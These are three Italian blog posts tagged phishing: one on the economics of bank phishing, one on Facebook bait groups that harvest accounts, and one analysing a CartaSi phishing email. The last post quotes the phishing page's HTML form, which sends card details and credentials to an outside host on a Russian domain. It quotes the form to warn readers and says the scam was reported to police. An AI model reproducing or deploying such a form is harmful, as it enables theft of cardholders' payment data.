Stefano Fratepietro website
Posts tagged Phishing
Il business del phishing
Mar 29th
Il phishing è un business per tutti fuorchè per il correntista. E’ un business per il phisher, è un business per le banche stesse, è un business soprattutto per le aziende informatiche. Perchè dico questo? Perchè per estinguere il fenomeno basterebbe un forte investimento in tecnologia da parte delle banche nell’acquisto di soluzioni informatiche del tipo phishing zero. Scordatevi i token, sono ormai obsoleti! Di cosa sto parlando? Sto parlando di un notevole investimento in risorse, come quello fatto ad esempio da Poste Italiane, che permette di generale un codice dispositivo univoco per quella sola ed univoca transazione; in poche parole potreste effettuare bonifici anche da computer infetti da tutti i malware di questo mondo senza preoccuparvi di nulla perchè tanto la chiave che state per inserire è valida solo e solamente per la transazione dal conto corrente x al conco y nel giorno e nell’ora z. Dov’è il business delle banche in tutto questo? Beh, il solo non investire denaro comporta ad un notevole risparmio di capitale; la stra grande maggioranza delle banche non vuole spendere soldi in tecnologia e se costretta, vuole spendere il meno possibile. A conti fatti costa meno andare in dibattimento o risarcire il correntista, tanto al 90% è colpa dell’utente!
Chi ci guadagna sempre? L’azienda fornitrice di servizi informatici che direttamente o indirettamente hanno sempre il loro tornaconto, dal servizio di chiusura siti esca “one shot 500 euro”, alla vendita di dispositivi di strong authentication, al servizio di consulenza in tribunale in difesa della banca o del cliente. Chi ringrazia? Il singolo phisher e le aziende dell’est, fornitrici di siti Internet pre confezionati per l’ente bancario, che si permettono di fornire anche servizi call center in lingua italiana, d’altronde se parlano la nostra lingua vuol dire che il nostro paese è un investimento sicuro.
Facebook e la beffa dei gruppi con le crisi di identità
Dec 14th
Tra un mksquashfs e un test di file pcap da dare in pasto ad Xplico sulla ormai imminente DEFT v5x, mi sto divertendo nel leggere le imprecazioni dei miei amici su Facebook che solo ora si sono accorti che i gruppi di dubbia utilità come “Facebook gratis nel 2010 solo se siamo in 1.000.000″ oppure “Il jekpot del super enalotto ai terremotati dell’Aquila” e molti, ma credetemi, molto molti altri si sono tramutati, in preda ad una evidente crisi di identità, in gruppi di solidarietà al premier Silvio Berlusconi. E’ da circa un anno che io e Massimiliano Dal Cero spacciamo link sulla nostra bacheca spiegando che i gruppi alla “Attiva la nuova chat di facebook” o “Attiva l’account Vip oro super sboron edition” altro non sono che delle grosse reti da pesca gettate nel mare di Facebook per fare del vero e proprio phishing catturando quanti più account possibili in un gruppo, da utilizzare un giorno a proprio piacimento o magari rivenderli ad agenzie di marketing per della pubblicità. A chi non farebbe gola un pacchetto da 1.00.000 di account a cui inviare messaggi di pubblicità totalmente legali senza che essi possano essere considerati spam? E’ tutto grasso che cola per chi fa un lavoro (come il politico) basato sulla divulgazione di informazioni, pensieri, marketing o che dir si voglia.
Primi a cascarci (volutamente?) sono state molte testate giornalistiche, radio, tv e telegiornali nazionali che hanno sparato la notizia subito dopo il classico filmato del lancio della statuetta del duomo contro il nostro premier; da qui è partito immediatamente una riflessione mediatica del genio di turno che ha condannato i gruppi contro Tartaglia (e qui sono d’accordo pure io) ed elogiato i gruppi pro Silvio Berlusconi.
Detto ciò, per l’amor proprio e del vostro cervello, da oggi evitate di iscrivermi ai gruppi da “bimbo minkia“, soprattutto per chi da anni ormai ha superato la maggiore età.
Vi saluto lasciandovi dei link che raccolgono e spiegano il fenomeno dei gruppi esca:
http://www.catepol.net/2009/02/19/le-bufale-su-facebook-non-cascateci/#axzz0YNE5ywby
Phishing CartaSi
Oct 1st
credit: Ivan Annibali
Vi segnalo un ingegnoso, ma pur sempre stupidino per un informatico, metodo per truffare i possessori di carte di credito CartaSi. In queste settimane è in giro per la rete una e-mail con il solito e tipico testo dove invitano il titolare della carta ad entrare nel sito di CartaSi cliccando sulla pagina web allegata nell’ e-mail.
Di prima apparrenza è tutto identico e preciso al sito originale, ma andando a leggere l’html del file si trova questo simpatico form:
<form name=”regForm” method=”post” action=”http://stavki-sport.ru/catalog/images/dvd/pt.php“>
<input type=”hidden” name=”fun” id=”fun” value=”start” />
<input type=hidden name=username value=”<?echo $username; ?>”>
<input type=hidden name=password value=”<?echo $password; ?>”>
<div>
<h3></h3><p>Benvenuto!<br/>Digita il numero della tua Carta:</p>
<li>il <strong>codice di sicurezza di tre cifre</strong>
che trovi sul retro della tua CartaSi (come da immagine)
<a href=”#” onclick=”javascript:popup(); return false;”>
<img src=”https://portal.cartasi.it/imageserver/titolari/images/cvv2_b.gif”> </a>
</li>
</ul>
In grassetto la parte interessante… state inviando tutti i dati a chissà chi in Russia.
Preso e segnalato alla Pol Post. :-)